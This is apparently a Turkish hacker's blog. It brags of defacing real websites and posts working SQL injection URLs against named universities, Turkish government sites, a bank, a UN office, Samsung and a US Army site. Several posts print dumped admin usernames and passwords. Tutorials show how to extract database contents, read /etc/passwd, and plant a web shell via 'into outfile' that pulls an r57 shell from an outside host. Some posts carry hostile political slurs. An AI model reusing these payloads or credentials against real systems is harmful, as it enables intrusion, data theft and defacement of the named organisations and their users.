Pr 5 olmuşum :D

pagerank gücenllemesi geldi bide baktım

pr 5 olmuşum hade hayırlısı :D


by TheNeSa

Çukurova Üniversitesi Fizik Bölümü - fizik.cu.edu.tr Hacked !

Site:

http://fizik.cu.edu.tr

Mirr0r:

http://zone-h.org/mirror/id/9009398

by TheNeSa

www.Nic.ba SQL

Site:

http://www.nic.ba

SQL

http://www.nic.ba/stream/press/index.php?sta=3&pid=113
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25

version 4 tablo tahmin etmek gerekiyo.
tablo bulan basar google'a microsofta

http://www.nic.ba/stream/press/index.php?sta=3&pid=113
%20and%201=2%20union%20select%201,unhex(hex(@@version))
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25

buda panel :

http://www.nic.ba/stream/adminlogin/

by TheNeSa

MSSQL Union Kullanımı

mysql de access te herkes union kullanır ama mssql
genelde kullanılmas ve etrafta tek döküman
yok bunun için bende böle bi döküman hazırladım
inş anlatabilmişimdir.

Önce order by ile column sayısını alalım.

http://www.thenesa.com/nesa.asp?id=1 order by 1--

http://www.thenesa.com/nesa.asp?id=1 order by 2--

http://www.thenesa.com/nesa.asp?id=1 order by 3--

http://www.thenesa.com/nesa.asp?id=1 order by 4--

v.s column u eşitledik 4 olsun.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,4--

şimdi versionu alalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,@@version--

ve şimdi de unionla informaion shemadan veri çekelim.

bunu sysobject'den veri almak içinde kullanbilirsiniz bu

size kalmış.

Şimdi Tablo Alalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,table_name from information_schema.tables--

Bir tablo alırız. Aldığımız tablo admin olsun

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,table_name from information_schema.tables
where table_name not in ('admin')--

Bu şekilde admin’den sonraki tabloyu alırız.ve soraki tablo

nesa olsun.nesa’dan soraki tabloyuda bu şekilde alıyoruz.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,table_name from information_schema.tables where
table_name not in ('admin','nesa')--

ve ondan soraki tablo...

Column alalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 11,22,33,column_name from information_schema.columns
where table_name='admin'--

admin tablosunun ilk Column’unu verir. Ilk column id olsun.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,column_name from information_schema.columns where
table_name='admin' and column_name not in ('id')--

id den soraki column.Aldığımız column username olsun.

Soraki column’u alalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,column_name from information_schema.columns
where table_name='admin' and column_name not in ('id','username')--

bu şekilde.

Şimdide union la veri okuyalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,username from admin--

aldığımız username admin olsun. adminden soraki username almak için

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,username from admin where username not in ('admin')--

işte bu şekilde...

by TheNeSa

MSSQL’de information_Schema Tablo Column alımı

Tablo alalım.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables))—

Bir tablo alırız. Aldığımız tablo admin olsun

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables
+where+table_name+not+in+(‘admin')))--

Bu şekilde admin’den sonraki tabloyu alırız.ve soraki tablo
nesa olsun.nesa’dan soraki tabloyuda bu şekilde alıyoruz.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables
+where+table_name+not+in+('admin','nesa')))--

Column Alalım.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'))--

admin tablosunun ilk Column’unu verir. Ilk column id olsun.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'+and+column_name+
not+in+('id')))—

Id’den sonraki column’u aldık. Aldığımız column username olsun.
Soraki column’u alalım.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'+and+column_name
+not+in+('id','username')))--

bu şekilde soraki column’uda alırıs.

Bide burda veri okuyalım.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+username+from+admin))--

aldığımız username admin olsun soraki

username için yine not in kullancas

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+username+from+admin
+where+username+not+in+('admin')))--

fazla uzatmaya gerek yok bu şekilde işte :D

Unitybank SQL alın size bide Banka :D

Site:

http://www.unitybank.com/

SQL:

http://www.unitybank.com/careers.asp?ntype=-99993+union+select+
0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+tbladmin--

bi bankamız eksikti :D

by TheNeSa

Zekeriyabeyaz.com.tr SQL

Site:

http://zekeriyabeyaz.com.tr

SQL:

http://zekeriyabeyaz.com.tr/video_izle.asp?id=12+union+select+
0,password,2,3,4,username,6+from+tblconfiguration

çok önceden bulmuştum arşivde gördüm siteye koyim
dedim belki panel bulupta çakan olur :D

by TheNeSa

www.fashiontv.com.tr Hacked !

site:

www.fashiontv.com.tr


mirr0r:

http://zone-h.org/mirror/id/9001970


by TheNeSa

www.un.org.mv SQL

site:

www.un.org.mv

SQL

http://www.un.org.mv/v2/?lid=15&nid=33 and 1=2+union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+users--


isteyen bassın ;)

by TheNeSa

www.lada.gr Hacked !

site:

www.lada.gr

mirr0r:

http://turk-h.org/defacement/view/326053/lada.gr/_en/
http://mirror-h.com/bak.php/?id=65707
http://turkey-h.org/defacements/?id=58215

by TheNeSa

www.bmw.com.tw Hacked !

Site:

www.bmw.com.tw

mirr0r:

http://www.turk-h.org/defacement/view/326027/bmw.com.tw/bmwclub2/
http://www.turkey-h.org/defacements/?id=58060
http://mirror-h.com/bak.php/?id=65622

by TheNeSa

www.uncapsa.org Hacked !

site:

http://www.uncapsa.org/

http://www.uncapsa.org/Palawija_Detail.asp?VJournalKey=776

mir0r:

http://turkey-h.org/defacements/?id=58049


by TheNeSa

www.microsoftgov.co.kr Hacked

site:

www.microsoftgov.co.kr


mirr0r:

http://zone-h.org/mirror/id/8992543
http://turk-h.org/defacement/view/326017/microsoftgov.co.kr/album/
http://mirror-h.com/bak.php/?id=65612
http://turkey-h.org/defacements/?id=57945
http://www.cyber-mirror.org/Mirror/81413/microsoftgov.co.kr/album/albummain.asp
http://z0ne-h.org/mirror-h/izle.php/?id=836&http://www.microsoftgov.co.kr/album/AlbumMain...


by TheNeSa

microsoft.co.kr Hacked !

site:http://partner.microsoft.co.kr

mirr0rlar:

http://turk-h.org/defacement/view/326016/partner.microsoft.co.kr/a..
http://mirror-h.com/bak.php/?id=65611
http://turkey-h.org/defacements/?id=57942
http://www.cyber-mirror.org/Mirror/81411/partner.microsoft.co.kr/album/albummain.asp


by TheNeSa

www.odu.edu.tr SQL

http://www.odu.edu.tr/

SQL:

http://www.odu.edu.tr/IdariBirim/tr/sayfa.php?birimid=11
&id=43+AND+1=2+UNION+SELECT+0,1,
group_concat(id,0x3a,username,0x3a
,password),3,4,5,6+FROM+b_yonetici--

by TheNeSa - Thx: DraKuLa

www.kku.edu.tr SQL

site:

http://www.kku.edu.tr

SQL:

http://www.kku.edu.tr/fen_edebiyat/detay.php?git=
badalbas&id=58%20and%201=2+union%20select%201,
group_concat(id,0x3a,
username,0x3a,passwd),3+from+manager

md5 kırımadım :S

by TheNeSa

www.ce.yildiz.edu.tr SQL

site:

www.ce.yildiz.edu.tr

SQL:

http://www.ce.yildiz.edu.tr/myindex.php?id=3 and 1=2 union select 1,2,3,4--

version 4 tablo kolon uğraşamıyom :S

panel:

http://www.ce.yildiz.edu.tr/login.php

www2.bayar.edu.tr SQL

Site:

www2.bayar.edu.tr

SQL:

http://www2.bayar.edu.tr/duyuru/haber/yazicidostu.php?id=72%20and%201=1+union
+select+0,1,2,3,4,5,6,7,group_concat(username,0x3a,sifre)
,9,10,11,12,13,14,15,16,17,18,19,20,21,23+from+user

http://www2.bayar.edu.tr/duyuru/haber/haber.php?id=316%20and%201=2+union
%20select%201,2,3,4,5,6,7,8,group_concat
(id1,0x3a,username,0x3a,email,0x3a,sifre,0x3a,
aktiv,0x3a,aktson,0x3a),10,11,12,13,14,15,16,17,18
,19,20,21,22,23+from+user--

panel:

http://www2.bayar.edu.tr/duyuru/haber/panel/login.php


by TheNeSa

www.pmyo.sakarya.edu.tr SQL

Site:

http://www.pmyo.sakarya.edu.tr


SQL:

http://www.pmyo.sakarya.edu.tr/haber.php?id=78%20and%201=2+union%20select
%201,group_concat(id,0x3a,username,0x3a,sifre,0x3a,editorluk)
,3,4,5+from+uyeler

Panel:

http://www.pmyo.sakarya.edu.tr/admin/


by TheNeSa

Adım Adım www.istanbul.edu.tr SQL

Dbler

http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(schema_name),4,5,6+from+
information_schema.schemata

information_schema,dbmbg

Tablolar

http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,
2,group_concat(table_name),4,5,6+from+
information_schema.tables+where+table_schema=
CONCAT(CHAR(100),CHAR(98),CHAR(109),CHAR(98),CHAR(103))

cv,dosya,duyuru,fotokategori,galeri,kategori,makale,personel,slayt,yonetici

Kolonlar

http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(column_name),4,5,6+from+information_schema.columns
+where+table_name=CONCAT(CHAR(121),CHAR(111),CHAR(110),
CHAR(101),CHAR(116),CHAR(105),CHAR(99),CHAR(105))

yoneticino,yoneticimail,yoneticiparola

Ve passlar

http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(yoneticino,0x3a,yoneticimail,0x3a,yoneticiparola),4,5,6+
from+yonetici

1:molbigen@istanbul.edu.tr:uthgnbkfhr2809546722i3ea


by TheNeSa

www.xoybun.com - www.pdk-xoybun.com Fucked - Fuck Pkk

www.xoybun.com - www.pdk-xoybun.com - Fucked - Fuck Pkk

site1:www.xoybun.com
site2:www.pdk-xoybun.com

zone1:http://zone-h.org/mirror/id/8982909
zone2:http://zone-h.org/mirror/id/8982905

fuck Pkk

by TheNeSa

http://www.bayrampasa.gov.tr SQL

http://www.bayrampasa.gov.tr/modules.php?name
=Sections&op=printpage&artid=9999999+union+select
+group_concat(uid,0x3a,uname,0x3a,pass),
1+from+nuke_users


panel:http://www.bayrampasa.gov.tr/admin/

burda bi yerlede bakmadım :S


by TheNeSa

http://www.zazaki.org Pkk sitesi SQL

http://www.zazaki.org/modules.php?name=Sections&
sop=printpage&artid=1+union+select+group_concat
(username,0x3a,user_password,
0x3a,user_group_cp),1+from+zazii234_users

http://www.zazaki.org/modules.php?name=Sections&
sop=printpage&artid=1+union+select+group_concat
(0x3a,name,0x3a,pwd,0x3a),1
+from+zazii23_authors

paneli bulamadım bulsam sokcamtım :S

by TheNeSa

MySQL İnjection Anlatım

Mysql İnjection:

önce kolon sayısını öğrenelim

thenesa.php?id=-1+order+by+xxx--
xx yerine 1,2,10 v.s sayı yazarak kolon öğreniyoruz

kolon sayımız 3 olsun

thenesa.php?id=-1+union+select+0,1,2--

bu şekle dönüştü.

kolonu sayısını bulduk

eğer kolonlar görünmüyosa id'yi -1 99999 -99999

v.s yani kullanılmayan id lerden bitane seçersek sonuç verçektir.

kolon sayılarını eşitledik.

şimdi Load_file ile dosya okuyalım.

eğer makina linux ise

thenesa.php?id=-1+union+select+0,1,
load_file(/etc/passwd)--

engel varsa hexleriz veya char kullanırız.

thenesa.php?=9999999 union select 0,1,
unhex(hex(/etc/passwd)—

thenesa.php?=9999999 union select 0,1,
char(47,101,116,99,47,112,97,115,115,119,100)—

char da benzer şekilde mantık ' vs engelli

karekterleri kullanmama yerine char hex v.s kullanma.

bu şekilde /etc/passwd okuyoruz.

eğer windovs ise

boot.ini‘yi okuyabiliriz

thenesa.php?id=-1+union+select+0,1,
load_file(c:/boot.ini)--

thenesa.php?id=-1+union+select+0,1,load_file
(0×633a2f626f6f742e696 e69)--

işte bu şekilde okuyorus burda config felan okuyabilirsiniz
veya ilerde göreceğimiz dosya uzantısı bulup rfi yiyen dosya
upload edebiliriz v.s geliştirmek size kalmış.

mysql Version'u bulalım.versiyon 4'lerde
tablo kolon tahmin edebilirsiniz.aynen acces gibi.
version 5'lerde tablo kolon çekebilirsiniz.

thenesa.php?id=-9999+union+select+0,1,@@version--

duruma göre hexleyin veya char felan işte..

versiyon 5 varsayalım .information_schema
tablo kolon çekelim.

önce dbleri çekelim

thenesa.php?id=-9999+union+select+0,1,schema_name
+from+information .schemata+limit1,1--

limit 1,1 limit 2.1 v.s yaparak diğer veritablarını alırız.

thenesa.php?id=-9999+union+select+0,1,
group_concat(schema_name)+fr om+information.schemata--

Group ile hepsini alırıs.

şimdi tablo adlarını alalım.

thenesa.php?id=--9999+union+select+0,1,table_name
+from+INFORMATION_ SCHEMA.TABLES+where+
table_schema=’dbadi’+limit 1,1--

limit 1,1 limit 2.1 v.s yaparak diğer tabloları alırız. .

thenesa.php?id=--9999+union+select+0,1,
group_concat(table_name)+fro m+I
NFORMATION_SCHEMA.TABLES+where+
table_schema=’db adi’--

Group ile hepsini alırıs.

kolon adlarınıda alalım.

thenesa.php?id=-9999+union+select+0,1,
COLUMN_NAME+from+INFORMATION _SCHEMA.
COLUMNS+where+table_name=
'tabloadi'+limit+ 1,1--

limit 1,1 limit 2.1 v.s yaparak diğer columnları alırız.

thenesa.php?id=-9999+union+select+0,1,
group_concat(COLUMN_NAME)+fr om+I
NFORMATION_SCHEMA.COLUMNS
+where+table_name='ta bloadi'--

Group ile hepsini alırıs.


mysql kullanıcı adi ve şifre alalım.

thenesa.php?id=-9999+union+select+
user,password+from+mysql.user--

burdan mysql bağlanabilirsiniz..


into outfile ile rfi açalım.

into outfile ile rfi(Remote File İnclusion) açığı oluşturabiliriz.

tabi önce sitein dosya yolunu bulcaz.Onu load_file kullanarak bulabilirsiniz.

bulduk diyelim.

home/nesa/public_html/

yazılabilir bi yere uygulayalım.

thenesa.php?id=-9999+union+select+
''+into+outfile+'/home/nesa/public_html
/images/nesa.php'--

site thenesa.com olsun mesela
thenesa.com/images/nesa.php?nesa=
http://thenesa.by.ru/r57.txt?


Tamamen TheNeSa Tarafından Düzenlenmiştir.

iletişim: msn@thenesa.com - thenesa.blogspot.com

by TheNeSa

http://www.god.com.hk SQL - Pagerank 5

Site:http://www.god.com.hk

http://www.god.com.hk/product_content.php?
a1catid=558+union+select+0,concat(email,0x3a,
password)+from+member--


by TheNeSa

http://www.rizeram.gov.tr SQL

http://www.rizeram.gov.tr/haberrizeram/
haber_detay.asp?id=-207+union+select+0,1
,2,3,4,5,6,7,8+from+ayarlar

http://www.rizeram.gov.tr/haberrizeram/
admin/admin.asp


by TheNeSa

http://www.ogm-amasyaobm.gov.tr SQL pagerank 6 :D

http://www.ogm-amasyaobm.gov.tr/haber_detay.asp?id=-78+union+select+0,1,2,3,4,5,6,6,7,8,9,1,11,99,0,0+from+admin

http://www.ogm-amasyaobm.gov.tr/kontrol.asp


by TheNeSa

http://www.batman-bld.gov.tr SQL

http://www.batman-bld.gov.tr/haber_detay.asp?id=-236+union+select+0,1,2,admin,4,password+from+admin

http://www.anamurtarim.gov.tr SQL

http://www.anamurtarim.gov.tr/www/haber_detay.asp?id=72+union+select+0,ksifre,kadi,3,4,5,6+from+kullanici

http://www.anamurtarim.gov.tr/www/yonetim/giris.asp


by TheNeSa

http://apac.sec.samsung.com SQL

Site:http://apac.sec.samsung.com

http://apac.sec.samsung.com/sg/mobile_phone/ultranista/viewdetails.asp?ID=77%20update+ultra_user_tbl+set+ScreenName=char(97)


tek harften fazla update yapabilen varsa yapsın S:

http://www.airtahitinui-usa.com SQL

site:http://www.airtahitinui-usa.com/

password

http://www.airtahitinui-usa.com/atnspecial/atnspecial.asp?id=1299%20and%201=convert%20(int,%20(select%20top%201%20password%20from%20atn_res_login));--

username

http://www.airtahitinui-usa.com/atnspecial/atnspecial.asp?id=1299%20and%201=convert%20(int,%20(select%20top%201%20username%20from%20atn_res_login));--

username:jim
password:cctiare$

panel:
http://www.airtahitinui-usa.com/admin


htaccess şifreli galiba geçemedim :S

by TheNeSa

perweb.firat.edu.tr Hacked

site:http://perweb.firat.edu.tr

mirror:http://zone-h.org/mirror/id/8962924

sql injection

by TheNeSa

Amerikan Ordusu SQL www.trac.army.mil

site:http://www.trac.army.mil/

username

http://www.trac.army.mil/defaultbody.asp?cid=14%20and%201=convert%20(int,(select%20top%201%20username%20from%20adminuser))

password

http://www.trac.army.mil/defaultbody.asp?cid=14%20and%201=convert%20(int,(select%20top%201%20password%20from%20adminuser))

username:Mbauman
password:Cherry

http://www.trac.army.mil/admin

panel sayfası şifrelenmiş onu aşamadım :S


by TheNeSa ;)

Post Method Sql Injektion

Post Method Sql Injektion

http://rapidshare.com/files/118588418/Post_Method_Sql_Injektion.rar.html

kaynak:cw

PHP Script’s Sql Injektion

PHP Script’s Sql Injektion

http://rapidshare.com/files/115983366/php_script_s_sql_injektion.rar.html

kaynak:cw

Mysql Sql Injektion Mysql Userden Veri Çekme

Mysql Sql Injektion Mysql Userden Veri Çekme

http://rapidshare.com/files/115982532/mysql_sql_injektion_mysql_userden_veri_cekme.rar.html

kaynak:cw

Mysql Sql Injektion Kolon Sayısını Öğrenme

Mysql Sql Injektion Kolon Sayısını Öğrenme

http://rapidshare.com/files/115983110/mysql_sql_injektion_kolon_sayisini_ogrenme.rar.html

kaynak:cw

MySql Sql Injektion

MySql Sql Injektion

http://rapidshare.com/files/115981217/mysql_sql_injektion.rar.html

kaynak:cw

Mssql Unclosed Veri Çekme

Mssql Unclosed Veri Çekme

http://rapidshare.com/files/115981552/mssql_unclosed_veri_cekme.rar.html

kaynak:cw

Mssql Unclosed Update

Mssql Unclosed Update

http://rapidshare.com/files/115980219/mssql_unclosed_update.rar.html

kaynak:cw

Mssql Unclosed Add Meta

Mssql Unclosed Add Meta

http://rapidshare.com/files/115979743/mssql_unclosed_add_meta.rar.html

kaynak:cw

Ms Acces Sql Injektion

Ms Acces Sql Injektion

http://rapidshare.com/files/115980304/ms_acces_sql_injektion.rar.html

kaynak:cw

MD5 Hash Brute Force Exploit Video

MD5 Hash Brute Force Exploit Video

http://rapidshare.com/files/115977249/md5_hash_brute_force_exploit_video.rar.html

kaynak:cw

Local File Inclusion (LFI)

Local File Inclusion (LFI)

http://rapidshare.com/files/115976579/local_file_inclusion.rar.html

kaynak:cw

Cros Site Scripting (Xss) Bulma

Cros Site Scripting (Xss) Bulma

http://rapidshare.com/files/115976604/cros_site_scripting__xss__bulma.rar.html

kaynak:cw

Chmod Security Admin Bilgisizligi

Chmod Security Admin Bilgisizligi

http://rapidshare.com/files/115975077/chmod_security_admin_bilgisizligi.rar.html

Kaynak:cw